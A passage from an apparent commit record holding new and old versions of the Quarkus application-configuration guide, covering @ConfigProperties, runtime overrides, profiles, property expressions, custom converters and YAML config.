greetingConfiguration;\n----\n\nAnother alternative style provided by Quarkus is to create `GreetingConfiguration` as an interface like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\")\npublic interface GreetingConfiguration {\n\n @ConfigProperty(name = \"message\") <1>\n String message();\n\n @ConfigProperty(defaultValue = \"!\")\n String getSuffix(); <2>\n\n Optional<String> getName(); <3>\n}\n----\n<1> The `@ConfigProperty` annotation is needed because the name of the configuration property that the method corresponds to doesn't follow the getter method naming conventions\n<2> In this case since `name` was not set, the corresponding property will be `greeting.suffix`.\n<3> It is unnecessary to specify the `@ConfigProperty` annotation because the method name follows the getter method naming conventions (`greeting.name` being the corresponding property) and no default value is needed.\n\nWhen using `@ConfigProperties` on a class or an interface, if the value of one of its fields is not provided, the application startup will fail and a `javax.enterprise.inject.spi.DeploymentException` indicating the missing value information will be thrown.\nThis does not apply to `Optional` fields and fields with a default value.\n\n=== Additional notes on @ConfigProperties\n\nWhen using a regular class annotated with `@ConfigProperties` the class doesn't necessarily have to declare getters and setters.\nHaving simple public non-final fields is valid as well.\n\nFurthermore, the configuration classes support nested object configuration. Suppose there was a need to have an extra layer\nof greeting configuration named `hidden` that would contain a few fields. This could be achieved like so:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n public String message;\n public String suffix = \"!\";\n public Optional<String> name;\n public HiddenConfig hidden; <1>\n\n public static class HiddenConfig {\n public Integer prizeAmount;\n public List<String> recipients;\n }\n}\n----\n<1> The name of the field (not the class name) will determine the name of the properties that are bound to the object.\n\nSetting the properties would occur in the normal manner, for example in `application.properties` one could have:\n\n[source,properties]\n----\ngreeting.message = hello\ngreeting.name = quarkus\ngreeting.hidden.prize-amount=10\ngreeting.hidden.recipients=Jane,John\n----\n\nFurthermore, classes annotated with `@ConfigProperties` can be annotated with Bean Validation annotations similar to the following example:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\nWARNING: For validation to work, the `quarkus-hibernate-validator` extension needs to be present.\n\nIf the validation fails with the given configuration, the application will fail to start and indicate the corresponding validation errors in the log.\n\nIn the case of an interface being annotated with `@ConfigProperties`, the interface is allowed to extend other interfaces and methods from\nthe entire interface hierarchy are used to bind properties.\n\n=== Using same ConfigProperties with different prefixes\n\nQuarkus also supports the use of the same `@ConfigProperties` object with different prefixes for each injection point using the `io.quarkus.arc.config.@ConfigPrefix` annotation.\nSay for example that `GreetingConfiguration` from above needs to be used for both the `greeting` prefix and the `other` prefix.\nIn that case the code would look like so:\n\n`GreetingConfiguration.java`\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\n`SomeBean.java`\n[source,java]\n----\n@ApplicationScoped\npublic class SomeBean {\n\n @Inject <1>\n GreetingConfiguration greetingConfiguration;\n\n @ConfigPrefix(\"other\") <2>\n GreetingConfiguration otherConfiguration;\n\n}\n----\n<1> At this injection point `greetingConfiguration` will use the `greeting` prefix since that is what has been defined on `@ConfigProperties`.\n<2> At this injection point `otherConfiguration` will use the `other` prefix from `@ConfigPrefix` instead of the `greeting` prefix. Notice that in this case `@Inject` is not required.\n\n== Configuring Quarkus\n\nQuarkus itself is configured via the same mechanism as your application. Quarkus reserves the `quarkus.` namespace\nfor its own configuration. For example to configure the HTTP server port you can set `quarkus.http.port` in\n`application.properties`.\n\n[IMPORTANT]\n====\nAs mentioned above, properties prefixed with `quarkus.` are effectively reserved for configuring Quarkus itself and\ntherefore `quarkus.` should **never** be used as prefix for application specific properties.\n\nIn the previous examples using `quarkus.message` instead of `greeting.message` would result in unexpected behavior.\n====\n\n=== List of all configuration properties\n\nAll the Quarkus configuration properties are link:all-config[documented and searcheable].\n\n=== Generating configuration for your application\n\nIt is also possible to generate an example `application.properties` with all known configuration properties, to make\nit easy to see what Quarkus configuration options are available. To do this, run:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config\n--\n\nThis will create a `src\/main\/resources\/application.properties.example` file that contains all the config options\nexposed via the extensions you currently have installed. These options are commented out, and have their default value\nwhen applicable. For example this HTTP port config entry will appear as:\n\n\n[source,properties]\n--\n#\n# The HTTP port\n#\n#quarkus.http.port=8080\n--\n\nRather than generating an example config file, you can also add these to you actual config file by setting the `-Dfile`\nparameter:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config -Dfile=application.properties\n--\n\nIf a config option is already present (commented or not) it will not be added, so it is safe to run this after\nadding an additional extension to see what additional options have been added.\n\n== Overriding properties at runtime\n\nQuarkus does much of its configuration and bootstrap at build time.\nMost properties will then be read and set during the build time step.\nTo change them, make sure to repackage your application.\n\n[source,shell]\n--\n.\/mvnw clean package\n--\n\nExtensions do define _some_ properties as overridable at runtime.\nA canonical example is the database URL, username and password which is only known specifically in your target environment.\nThis is a tradeoff as the more runtime properties are available, the less build time prework Quarkus can do. The list of runtime properties is therefore lean.\n\nYou can override these runtime properties with the following mechanisms (in decreasing priority):\n\n1. using system properties:\n * for a runner jar: `java -Dquarkus.datasource.password=youshallnotpass -jar target\/myapp-runner.jar`\n * for a native executable: `.\/target\/myapp-runner -Dquarkus.datasource.password=youshallnotpass`\n2. using environment variables:\n * for a runner jar: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; java -jar target\/myapp-runner.jar`\n * for a native executable: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; .\/target\/myapp-runner`\n3. using an environment file named `.env` placed in the current working directory containing the line `QUARKUS_DATASOURCE_PASSWORD=youshallnotpass` (for dev mode, this file can be placed in the root of the project, but it is advised to not check it in to version control)\n4. using a configuration file placed in `$PWD\/config\/application.properties`\n * By placing an `application.properties` file inside a directory named `config` which resides in the directory where the application runs, any runtime properties defined\nin that file will override the default configuration. Furthermore any runtime properties added to this file that were not part of the original `application.properties` file\n_will also_ be taken into account.\n * This works in the same way for runner jar and the native executable\n\nNOTE: Environment variables names are following the conversion rules of link:https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configsources[Eclipse MicroProfile]\n\nNOTE: Environment variables without a configuration profile defined in `.env` file will overwrite all its related profiles in `application.properties`, e.g. `%test.application.value` is overwritten by `APPLICATION_VALUE` in `.env` file.\n\nNOTE: The `config\/application.properties` features is available in development mode as well. To make use of it, `config\/application.properties` needs to be placed inside the build tool's output directory (`target` for Maven and `build\/classes\/java\/main` for Gradle).\nKeep in mind however that any cleaning operation from the build tool like `mvn clean` or `gradle clean` will remove the `config` directory as well.\n\n=== Configuration Profiles\n\nQuarkus supports the notion of configuration profiles. These allow you to have multiple configuration in the same file and\nselect between them via a profile name.\n\nThe syntax for this is `%{profile}.config.key=value`. For example if I have the following:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%dev.quarkus.http.port=8181\n----\n\nThe Quarkus HTTP port will be 9090, unless the `dev` profile is active, in which case it will be 8181.\n\nTo use profiles in `.env` file, you can follow a `_{PROFILE}_CONFIG_KEY=value` pattern. A equivalent of the above example in `.env` file would be:\n\n[source,.env]\n----\nQUARKUS_HTTP_PORT=9090\n_DEV_QUARKUS_HTTP_PORT=8181\n----\n\nBy default Quarkus has three profiles, although it is possible to use as many as you like. The default profiles are:\n\n* *dev* - Activated when in development mode (i.e. `quarkus:dev`)\n* *test* - Activated when running tests\n* *prod* - The default profile when not running in development or test mode\n\nThere are two ways to set a custom profile, either via the `quarkus.profile` system property or the `QUARKUS_PROFILE`\nenvironment variable. If both are set the system property takes precedence. Note that it is not necessary to\ndefine the names of these profiles anywhere, all that is necessary is to create a config property with the profile\nname, and then set the current profile to that name. For example if I want a `staging` profile with a different HTTP port\nI can add the following to `application.properties`:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%staging.quarkus.http.port=9999\n----\n\nAnd then set the `QUARKUS_PROFILE` environment variable to `staging` to activate my profile.\n\n[NOTE]\n====\nThe proper way to check the active profile programmatically is to use the `getActiveProfile` method of `io.quarkus.runtime.configuration.ProfileManager`.\n\nUsing `@ConfigProperty(\"quarkus.profile\")` will *not* work properly.\n====\n\n=== Using Property Expressions\n\nQuarkus supports the use of property expressions in the `application.properties` file.\n\nThese expressions are resolved when the property is read.\nSo if your configuration property is a build time configuration property, the property expression will be resolved at build time.\nIf your configuration property is overridable at runtime, the property expression will be resolved at runtime.\n\nYou can use property expressions both for the Quarkus configuration or for your own configuration properties.\n\nProperty expressions are defined this way: `${my-property-expression}`.\n\nFor example, having the following property:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\nand another property defined as:\n\n[source,properties]\n----\ncallable.url=https:\/\/${remote.host}\/\n----\n\nwill result in the value of the `callable.url` property being set to:\n\n[source,properties]\n----\ncallable.url=https:\/\/quarkus.io\/\n----\n\nAnother example would be defining different database servers depending on the profile used:\n\n[source,properties]\n----\n%dev.quarkus.datasource.url=jdbc:mysql:\/\/localhost:3306\/mydatabase?useSSL=false\nquarkus.datasource.url=jdbc:mysql:\/\/remotehost:3306\/mydatabase?useSSL=false\n----\n\ncan be simplified by having:\n\n[source,properties]\n----\n%dev.application.server=localhost\napplication.server=remotehost\n\nquarkus.datasource.url=jdbc:mysql:\/\/${application.server}:3306\/mydatabase?useSSL=false\n----\n\nIt does result in one more line in this example but the value of `application.server` can be reused in other properties,\ndiminishing the possibility of typos and providing more flexibility in property definitions.\n\n=== Combining Property Expressions and Environment Variables\n\nQuarkus also supports the combination of both property expressions and environment variables.\n\nLet's assume you have following property defined in `application.properties`:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\n\nYou can combine environment variables and property expressions by having a property defined as follows:\n\n[source,properties]\n----\napplication.host=${HOST:${remote.host}}\n----\n\nThis will expand the `HOST` environment variable and use the value of the property `remote.host` as the default value if `HOST` is not set.\n\nFor the purpose of this section we used the property `remote.host` we defined previously.\nIt has to be noted that the value could have been a fixed one such as in:\n\n[source,properties]\n----\napplication.host=${HOST:localhost}\n----\n\nwhich will result in `localhost` as the default value if `HOST` is not set.\n\n=== Clearing properties\n\nRun time properties which are optional, and which have had values set at build time or which have a default value,\nmay be explicitly cleared by assigning an empty string to the property. Note that this will _only_ affect\nrun time properties, and will _only_ work with properties whose values are not required.\n\nThe property may be cleared by setting the corresponding `application.properties` property, setting the\ncorresponding system property, or setting the corresponding environment variable.\n\n==== Miscellaneous\nThe default Quarkus application runtime profile is set to the profile used to build the application.\nFor example:\n[source,shell]\n----\n.\/mvnw package -Pnative -Dquarkus.profile=prod-aws\n.\/target\/my-app-1.0-runner \/\/ <1>\n----\n<1> The command will run with the `prod-aws` profile. This can be overridden using the `quarkus.profile` system property.\n\n== Custom Configuration\n\n=== Custom configuration sources\n\nYou can also introduce custom configuration sources in the standard MicroProfile Config manner. To\ndo this, you must provide a class which implements either `org.eclipse.microprofile.config.spi.ConfigSource`\nor `org.eclipse.microprofile.config.spi.ConfigSourceProvider`. Create a\nhttps:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[service file] for the\nclass and it will be detected and installed at application startup.\n\n=== Custom configuration converters\n\nYou can also use your custom types as a configuration values. This can be done by implementing `org.eclipse.microprofile.config.spi.Converter<T>`\nand adding its fully qualified class name in the `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter` file.\n\nLet us assume you have a custom type like this one:\n\n[source,java]\n----\npackage org.acme.config;\n\npublic class MicroProfileCustomValue {\n\n private final int number;\n\n public MicroProfileCustomValue(int number) {\n this.number = number;\n };\n\n public int getNumber() {\n return number;\n }\n}\n----\n\nThe corresponding converter will look like the one below. Please note that your custom converter class must be `public` and must have\na `public` no-argument constructor. It also must not be `abstract`.\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport org.eclipse.microprofile.config.spi.Converter;\n\npublic class MicroProfileCustomValueConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n return new MicroProfileCustomValue(Integer.valueOf(value));\n }\n}\n----\n\nThen you need to include the fully qualified class name of the converter in a service file `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\nIf you have more converters, simply add their class names in this file as well. Single fully qualified class name per line, for example:\n\n[source]\n----\norg.acme.config.MicroProfileCustomValueConverter\norg.acme.config.SomeOtherConverter\norg.acme.config.YetAnotherConverter\n----\n\nPlease note that `SomeOtherConverter` and `YetAnotherConverter` were added just for a demonstration. If you include in this file classes\nwhich are not available at runtime, the converters loading will fail.\n\nAfter this is done you can use your custom type as a configuration value:\n\n[source,java]\n----\n@ConfigProperty(name = \"configuration.value.name\")\nMicroProfileCustomValue value;\n----\n\n==== Converter priority\n\nIn some cases, you may want to use a custom converter to convert a type which is already converted\nby a different converter. In such cases, you can use the `javax.annotation.Priority` annotation to\nchange converters precedence and make your custom converter of higher priority than the other\non the list.\n\nBy default, if no `@Priority` can be found on a converter, it's registered with a priority of 100\nand all Quarkus core converters are registered with a priority of 200, so depending on which\nconverter you would like to replace, you need to set a higher value.\n\nTo demonstrate the idea let us implement a custom converter which will take precedence over\n`MicroProfileCustomValueConverter` implemented in the previous example.\n\n[source,java]\n----\npackage org.acme.config;\n\nimport javax.annotation.Priority;\nimport org.eclipse.microprofile.config.spi.Converter;\n\n@Priority(150)\npublic class MyCustomConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n\n final int secretNumber;\n if (value.startsFrom(\"OBF:\")) {\n secretNumber = Integer.valueOf(SecretDecoder.decode(value));\n } else {\n secretNumber = Integer.valueOf(value);\n }\n\n return new MicroProfileCustomValue(secretNumber);\n }\n}\n----\n\nSince it converts the same value type (namely `MicroProfileCustomValue`) and has a priority\nof 150, it will be used instead of a `MicroProfileCustomValueConverter` which has a default\npriority of 100.\n\nNOTE: This new converter also needs to be listed in a service file, i.e. `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\n\n[[yaml]]\n== YAML for Configuration\n\n=== Add YAML Config Support\n\nYou might want to use YAML over properties for configuration.\nSince link:https:\/\/github.com\/smallrye\/smallrye-config[SmallRye Config] brings support for YAML\nconfiguration, Quarkus supports this as well.\n\nFirst you will need to add the YAML extension to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-config-yaml<\/artifactId>\n<\/dependency>\n----\n\nOr you can alternatively run this command in the directory containing your Quarkus project:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"config-yaml\"\n----\n\nNow Quarkus can read YAML configuration files.\nThe config directories and priorities are the same as before.\n\nNOTE: Quarkus will choose an `application.yaml` over an `application.properties`.\nYAML files are just an alternative way to configure your application.\nYou should decide and keep one configuration type to avoid errors.\n\n==== Configuration Examples\n[source,yaml]\n----\n# YAML supports comments\nquarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n\n# REST Client configuration property\norg:\n acme:\n restclient:\n CountriesService\/mp-rest\/url: https:\/\/restcountries.eu\/rest\n\n# For configuration property names that use quotes, do not split the string inside the quotes.\nquarkus:\n log:\n category:\n \"io.quarkus.category\":\n level: INFO\n----\n\n[NOTE]\n====\nQuarkus also supports using `application.yml` as the name of the YAML file. The same rules apply for this file as for `application.yaml`.\n====\n\n=== Profile dependent configuration\n\nProviding profile dependent configuration with YAML is done like with properties.\nJust add the `%profile` wrapped in quotation marks before defining the key-value pairs:\n\n[source,yaml]\n----\n\"%dev\":\n quarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n----\n\n=== Configuration key conflicts\n\nThe MicroProfile Configuration specification defines configuration keys as an arbitrary `.`-delimited string.\nHowever, structured formats like YAML naively only support a subset of the possible configuration namespace.\nFor example, consider the two configuration properties `quarkus.http.cors` and `quarkus.http.cors.methods`.\nOne property is the prefix of another, so it may not be immediately evident how to specify both keys in your YAML configuration.\n\nThis is solved by using a null key (normally represented by `~`) for any YAML property which is a prefix of another one. Here's an example:\n\n.An example YAML configuration resolving prefix-related key name conflicts\n[source,yaml]\n----\nquarkus:\n http:\n cors:\n ~: true\n methods: GET,PUT,POST\n----\n\nIn general, null YAML keys are not included in assembly of the configuration property name, allowing them to be used to\nany level for disambiguating configuration keys.\n\n== More info on how to configure\n\nQuarkus relies on SmallRye Config and inherits its features.\n\nSmallRye Config provides:\n\n* Additional Config Sources\n* Additional Converters\n* Interceptors for configuration value resolution\n* Relocate Configuration Properties\n* Fallback Configuration Properties\n* Logging\n* Hide Secrets\n\nFor more information, please check the\nlink:https:\/\/smallrye.io\/docs\/smallrye-config\/index.html[SmallRye Config documentation].\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Configuring Your Application\n\ninclude::.\/attributes.adoc[]\n\nHardcoded values in your code are a _no go_ (even if we all did it at some point ;-)).\nIn this guide, we learn how to configure your application.\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* between 5 and 10 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `config-quickstart` {quickstarts-tree-url}\/config-quickstart[directory].\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n[source,shell,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=config-quickstart \\\n -DclassName=\"org.acme.config.GreetingResource\" \\\n -Dpath=\"\/greeting\"\ncd config-quickstart\n----\n\nIt generates:\n\n* the Maven structure\n* a landing page accessible on `http:\/\/localhost:8080`\n* example `Dockerfile` files for both `native` and `jvm` modes\n* the application configuration file\n* an `org.acme.config.GreetingResource` resource\n* an associated test\n\n== Injecting configuration value\n\nQuarkus uses https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config] to inject the configuration in the application.\nThe injection uses the `@ConfigProperty` annotation.\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\")\nString message;\n----\n\nNOTE: When injecting a configured value, you can use `@Inject @ConfigProperty` or just `@ConfigProperty`.\nThe `@Inject` annotation is not necessary for members annotated with `@ConfigProperty`, a behavior which differs from https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config]\n\nEdit the `org.acme.config.GreetingResource`, and introduce the following configuration properties:\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\") <1>\nString message;\n\n@ConfigProperty(name = \"greeting.suffix\", defaultValue=\"!\") <2>\nString suffix;\n\n@ConfigProperty(name = \"greeting.name\")\nOptional<String> name; <3>\n----\n<1> If you do not provide a value for this property, the application startup fails with `javax.enterprise.inject.spi.DeploymentException: No config value of type [class java.lang.String] exists for: greeting.message`.\n<2> The default value is injected if the configuration does not provide a value for `greeting.suffix`.\n<3> This property is optional - an empty `Optional` is injected if the configuration does not provide a value for `greeting.name`.\n\nNow, modify the `hello` method to use the injected properties:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic String hello() {\n return message + \" \" + name.orElse(\"world\") + suffix;\n}\n----\n\n\n== Create the configuration\n\nBy default, Quarkus reads `application.properties`.\nEdit the `src\/main\/resources\/application.properties` with the following content:\n\n[source,shell]\n----\n# Your configuration properties\ngreeting.message = hello\ngreeting.name = quarkus\n----\n\nOnce set, check the application with:\n\n[source,shell]\n----\n$ curl http:\/\/localhost:8080\/greeting\nhello quarkus!\n----\n\nTIP: If the application requires configuration values and these values are not set, an error is thrown.\nSo you can quickly know when your configuration is complete.\n\n== Update the test\n\nWe also need to update the functional test to reflect the changes made to the endpoint.\nEdit the `src\/test\/java\/org\/acme\/config\/GreetingResourceTest.java` file and change the content of the `testHelloEndpoint` method to:\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/greeting\")\n .then()\n .statusCode(200)\n .body(is(\"hello quarkus!\")); \/\/ Modified line\n }\n\n}\n----\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nChanging the configuration file is immediately reflected.\nYou can add the `greeting.suffix`, remove the other properties, change the values, etc.\n\nAs usual, the application can be packaged using `.\/mvnw clean package` and executed using the `-runner.jar` file.\nYou can also generate the native executable with `.\/mvnw clean package -Pnative`.\n\n== Programmatically access the configuration\n\nYou can access the configuration programmatically.\nIt can be handy to achieve dynamic lookup, or retrieve configured values from classes that are neither CDI beans or JAX-RS resources.\n\nYou can access the configuration programmatically using `org.eclipse.microprofile.config.ConfigProvider.getConfig()` such as in:\n\n[source,java]\n----\nString databaseName = ConfigProvider.getConfig().getValue(\"database.name\", String.class);\nOptional<String> maybeDatabaseName = ConfigProvider.getConfig().getOptionalValue(\"database.name\", String.class);\n----\n\n== Using @ConfigProperties\n\nAs an alternative to injecting multiple related configuration values in the way that was shown in the previous example,\nusers can also use the `@io.quarkus.arc.config.ConfigProperties` annotation to group these properties together.\n\nFor the greeting properties above, a `GreetingConfiguration` class could be created like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\") <1>\npublic class GreetingConfiguration {\n\n private String message;\n private String suffix = \"!\"; <2>\n private Optional<String> name;\n\n public String getMessage() {\n return message;\n }\n\n public void setMessage(String message) {\n this.message = message;\n }\n\n public String getSuffix() {\n return suffix;\n }\n\n public void setSuffix(String suffix) {\n this.suffix = suffix;\n }\n\n public Optional<String> getName() {\n return name;\n }\n\n public void setName(Optional<String> name) {\n this.name = name;\n }\n}\n----\n<1> `prefix` is optional. If not set then the prefix to be used will be determined by the class name. In this case it would still be `greeting` (since the `Configuration` suffix is removed). If the class were named `GreetingExtraConfiguration` then the resulting default prefix would be `greeting-extra`.\n<2> `!` will be the default value if `greeting.suffix` is not set\n\nThis class could then be injected into the `GreetingResource` using the familiar CDI `@Inject` annotation like so:\n\n[source,java]\n----\n@Inject\nGreetingConfiguration greetingConfiguration;\n----\n\nAnother alternative style provided by Quarkus is to create `GreetingConfiguration` as an interface like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\")\npublic interface GreetingConfiguration {\n\n @ConfigProperty(name = \"message\") <1>\n String message();\n\n @ConfigProperty(defaultValue = \"!\")\n String getSuffix(); <2>\n\n Optional<String> getName(); <3>\n}\n----\n<1> The `@ConfigProperty` annotation is needed because the name of the configuration property that the method corresponds to doesn't follow the getter method naming conventions\n<2> In this case since `name` was not set, the corresponding property will be `greeting.suffix`.\n<3> It is unnecessary to specify the `@ConfigProperty` annotation because the method name follows the getter method naming conventions (`greeting.name` being the corresponding property) and no default value is needed.\n\nWhen using `@ConfigProperties` on a class or an interface, if the value of one of its fields is not provided, the application startup will fail and a `javax.enterprise.inject.spi.DeploymentException` indicating the missing value information will be thrown.\nThis does not apply to `Optional` fields and fields with a default value.\n\n=== Additional notes on @ConfigProperties\n\nWhen using a regular class annotated with `@ConfigProperties` the class doesn't necessarily have to declare getters and setters.\nHaving simple public non-final fields is valid as well.\n\nFurthermore, the configuration classes support nested object configuration. Suppose there was a need to have an extra layer\nof greeting configuration named `hidden` that would contain a few fields. This could be achieved like so:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n public String message;\n public String suffix = \"!\";\n public Optional<String> name;\n public HiddenConfig hidden; <1>\n\n public static class HiddenConfig {\n public Integer prizeAmount;\n public List<String> recipients;\n }\n}\n----\n<1> The name of the field (not the class name) will determine the name of the properties that are bound to the object.\n\nSetting the properties would occur in the normal manner, for example in `application.properties` one could have:\n\n[source,properties]\n----\ngreeting.message = hello\ngreeting.name = quarkus\ngreeting.hidden.prize-amount=10\ngreeting.hidden.recipients=Jane,John\n----\n\nFurthermore, classes annotated with `@ConfigProperties` can be annotated with Bean Validation annotations similar to the following example:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\nWARNING: For validation to work, the `quarkus-hibernate-validator` extension needs to be present.\n\nIf the validation fails with the given configuration, the application will fail to start and indicate the corresponding validation errors in the log.\n\nIn the case of an interface being annotated with `@ConfigProperties`, the interface is allowed to extend other interfaces and methods from\nthe entire interface hierarchy are used to bind properties.\n\n=== Using same ConfigProperties with different prefixes\n\nQuarkus also supports the use of the same `@ConfigProperties` object with different prefixes for each injection point using the `io.quarkus.arc.config.@ConfigPrefix` annotation.\nSay for example that `GreetingConfiguration` from above needs to be used for both the `greeting` prefix and the `other` prefix.\nIn that case the code would look like so:\n\n`GreetingConfiguration.java`\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\n`SomeBean.java`\n[source,java]\n----\n@ApplicationScoped\npublic class SomeBean {\n\n @Inject <1>\n GreetingConfiguration greetingConfiguration;\n\n @ConfigPrefix(\"other\") <2>\n GreetingConfiguration otherConfiguration;\n\n}\n----\n<1> At this injection point `greetingConfiguration` will use the `greeting` prefix since that is what has been defined on `@ConfigProperties`.\n<2> At this injection point `otherConfiguration` will use the `other` prefix from `@ConfigPrefix` instead of the `greeting` prefix. Notice that in this case `@Inject` is not required.\n\n== Configuring Quarkus\n\nQuarkus itself is configured via the same mechanism as your application. Quarkus reserves the `quarkus.` namespace\nfor its own configuration. For example to configure the HTTP server port you can set `quarkus.http.port` in\n`application.properties`.\n\n[IMPORTANT]\n====\nAs mentioned above, properties prefixed with `quarkus.` are effectively reserved for configuring Quarkus itself and\ntherefore `quarkus.` should **never** be used as prefix for application specific properties.\n\nIn the previous examples using `quarkus.message` instead of `greeting.message` would result in unexpected behavior.\n====\n\n=== List of all configuration properties\n\nAll the Quarkus configuration properties are link:all-config[documented and searcheable].\n\n=== Generating configuration for your application\n\nIt is also possible to generate an example `application.properties` with all known configuration properties, to make\nit easy to see what Quarkus configuration options are available. To do this, run:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config\n--\n\nThis will create a `src\/main\/resources\/application.properties.example` file that contains all the config options\nexposed via the extensions you currently have installed. These options are commented out, and have their default value\nwhen applicable. For example this HTTP port config entry will appear as:\n\n\n[source,properties]\n--\n#\n# The HTTP port\n#\n#quarkus.http.port=8080\n--\n\nRather than generating an example config file, you can also add these to you actual config file by setting the `-Dfile`\nparameter:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config -Dfile=application.properties\n--\n\nIf a config option is already present (commented or not) it will not be added, so it is safe to run this after\nadding an additional extension to see what additional options have been added.\n\n== Overriding properties at runtime\n\nQuarkus does much of its configuration and bootstrap at build time.\nMost properties will then be read and set during the build time step.\nTo change them, make sure to repackage your application.\n\n[source,shell]\n--\n.\/mvnw clean package\n--\n\nExtensions do define _some_ properties as overridable at runtime.\nA canonical example is the database URL, username and password which is only known specifically in your target environment.\nThis is a tradeoff as the more runtime properties are available, the less build time prework Quarkus can do. The list of runtime properties is therefore lean.\n\nYou can override these runtime properties with the following mechanisms (in decreasing priority):\n\n1. using system properties:\n * for a runner jar: `java -Dquarkus.datasource.password=youshallnotpass -jar target\/myapp-runner.jar`\n * for a native executable: `.\/target\/myapp-runner -Dquarkus.datasource.password=youshallnotpass`\n2. using environment variables:\n * for a runner jar: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; java -jar target\/myapp-runner.jar`\n * for a native executable: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; .\/target\/myapp-runner`\n3. using an environment file named `.env` placed in the current working directory containing the line `QUARKUS_DATASOURCE_PASSWORD=youshallnotpass` (for dev mode, this file can be placed in the root of the project, but it is advised to not check it in to version control)\n4. using a configuration file placed in `$PWD\/config\/application.properties`\n * By placing an `application.properties` file inside a directory named `config` which resides in the directory where the application runs, any runtime properties defined\nin that file will override the default configuration. Furthermore any runtime properties added to this file that were not part of the original `application.properties` file\n_will also_ be taken into account.\n * This works in the same way for runner jar and the native executable\n\nNOTE: Environment variables names are following the conversion rules of link:https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configsources[Eclipse MicroProfile]\n\nNOTE: The `config\/application.properties` features is available in development mode as well. To make use of it, `config\/application.properties` needs to be placed inside the build tool's output directory (`target` for Maven and `build\/classes\/java\/main` for Gradle).\nKeep in mind however that any cleaning operation from the build tool like `mvn clean` or `gradle clean` will remove the `config` directory as well.\n\n=== Configuration 